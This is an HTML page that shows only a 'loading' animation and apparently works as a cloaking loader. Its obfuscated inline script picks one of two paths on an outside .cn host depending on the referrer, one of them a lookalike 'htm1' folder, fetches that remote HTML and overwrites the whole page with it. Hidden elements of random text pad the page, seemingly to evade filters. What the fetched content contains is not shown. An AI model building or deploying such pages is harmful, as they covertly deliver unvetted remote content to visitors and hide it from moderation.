<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .labCUb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .labCUb .JqInScm3r82 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .labCUb .content {
            line-height: 50px;
            text-align: center
        }

        .labCUb .img {
            width: 100%
        }

        .labCUb .kdfw3a8OqXS {
            text-align: center
        }

        .labCUb .kdfw3a8OqXS span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .labCUb .kdfw3a8OqXS span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .labCUb .kdfw3a8OqXS span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .labCUb .kdfw3a8OqXS span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .labCUb .kdfw3a8OqXS span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .labCUb .kdfw3a8OqXS span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .labCUb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QuQXL7rHMXR2n(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var HzZ2n7v = QuQXL7rHMXR2n('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ HzZ2n7v +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ HzZ2n7v +".html?a=share";
		}
		
        joBKQkDh=url+"#"+new Date().getTime();
        joBKQkDh && function() {
            $.get(joBKQkDh, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>o1hrgvDUmiUWUlPOME2I65XqzH8fg8CE3J0DtoSLQwFxo3jjRZLRlSGwcWGGsj5KZapID1zunVYL0iJzWkh57JYouVTm</a>
<ul style='display:none' >n339XdY4brOFz7LUqfJEEua5cnRfZP0OyRGgfgbOdm9Bj</ul>
<h1 style='display:none' >VVQkVDmamnv3VWsPSBp1cqIbNetUPkHf4WlEVk</h1>
<a  href='#' style='display:none'>o1hrgvDUmiUWUlPOME2I65XqzH8fg8CE3J0DtoSLQwFxo3jjRZLRlSGwcWGGsj5KZapID1zunVYL0iJzWkh57JYouVTm</a>
<ul style='display:none' >n339XdY4brOFz7LUqfJEEua5cnRfZP0OyRGgfgbOdm9Bj</ul>
<b style='display:none' >xRPsX9wkmwaWVhxcXEXQCw9rBFEEmsofsSRMBeWlBOcW5LkA1ZokX3EurEqDxECptp4BiiMchwEvVeQJronUEJYQMu2ct3</b><div class="labCUb">
    <div class="JqInScm3r82">
        <div class="kdfw3a8OqXS">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>rapJjmnYpSmqSvFJCuzBrJjJMRjD306Q6VWhfUHSW0U1nZtgQiArH0Twh1AavuWUNeUMLlkudZtyNdgh7sbjac6</div>
<ul style='display:none' >ZuWzzPHYghAO0VQPdi47fkgQ9240wMV6FSOP3OzFrnODFLkMN1n2QIdtoE5LB</ul>
<h1 style='display:none' >kKHYFRFapFaSFte0U9y1HILubTOWy3MqG1bej6H8t2KRoqECZsN9AC1wDknuOsKUeotQnp6kB33Ta8RYmF86EU</h1>
<span style='display:none'>IhS8b0fUr6Ub5T9PgD0THm1gS8yuFuEDQEWx8rcYQOlihFS6PbsfVD8b83NXWQnXi1l2jBdPpblWlBJnhdnXvHF0pvLXkC7eHT</span></body>
</html>